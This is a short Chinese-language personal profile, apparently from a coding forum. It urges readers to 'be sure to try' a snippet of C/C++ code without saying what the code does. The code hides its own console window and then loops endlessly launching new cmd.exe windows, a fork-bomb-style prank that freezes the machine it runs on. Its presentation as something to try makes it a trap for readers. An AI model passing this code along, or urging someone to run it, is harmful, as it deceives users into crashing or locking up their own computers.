• 个人简介

    请务必尝试这串代码

    #include<stdio.h>
    #include<stdlib.h>
    #include<iostream>
    using namespace std;
    int i=9;
    int main(int argc,char*argv[])
    {
    	ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);
    	while(1)
    	system("start cmd.exe");
     }